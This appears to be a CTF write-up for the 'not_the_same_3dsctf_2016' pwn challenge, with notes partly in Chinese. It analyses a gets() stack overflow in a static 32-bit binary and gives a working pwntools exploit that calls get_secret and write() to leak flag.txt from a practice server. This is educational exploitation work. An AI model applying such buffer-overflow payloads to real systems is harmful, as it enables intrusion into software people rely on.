HugeH4rD

not_the_same_3dsctf_2016

ubuntu16

---

0x01

---

checksec

[*] '/home/zelas/Desktop/pwn/not_the_same_3dsctf_2016/not_the_same_3dsctf_2016'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled		//栈不可执行
    PIE:      No PIE (0x8048000)

静态链接

$ file not_the_same_3dsctf_2016 
not_the_same_3dsctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, not stripped

IDA

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[45]; // [esp+Fh] [ebp-2Dh] BYREF

  printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... ");
  gets(v4);	//gets()函数存在栈溢出漏洞
  return 0;
}

可疑字符串

.rodata:080BC2A8 00000009 C flag.txt

跟踪 看一下调用

Up o get_secret+C mov [esp+1Ch+var_1C], offset aFlagTxt; "flag.txt"

可疑函数

int get_secret()
{
  int v0; // esi

  v0 = fopen("flag.txt", &unk_80CF91B);
  fgets(&fl4g, 45, v0);		//将v0处写入&fl4g	//0X80ECA2D
  return fclose(v0);
}

//0x80489A0

0x02

---

思路

1.利用gets()函数溢出至get_secret()

s	0x2D
rbp	0x4
ret	get_secret
get_secret_ret	write()
write_ret	0xdeabeef
arg[0]	1
arg[1]	fl4g
arg[2]	0x100

0x03

---

from pwn import *

context(os='linux',arch='i386', log_level='debug')
# io = process(['./not_the_same_3dsctf_2016'])
io = remote('node4.buuoj.cn', 27976)
write = 0x806E270
padding = 0x2D
get_secret = 0x80489A0
fl4g = 0x080ECA2D

payload = b'a' * padding + p32(get_secret) + p32(write) + p32(0xdeadbeef) + p32(1) + p32(fl4g) + p32(100)
io.sendline(payload)

io.interactive()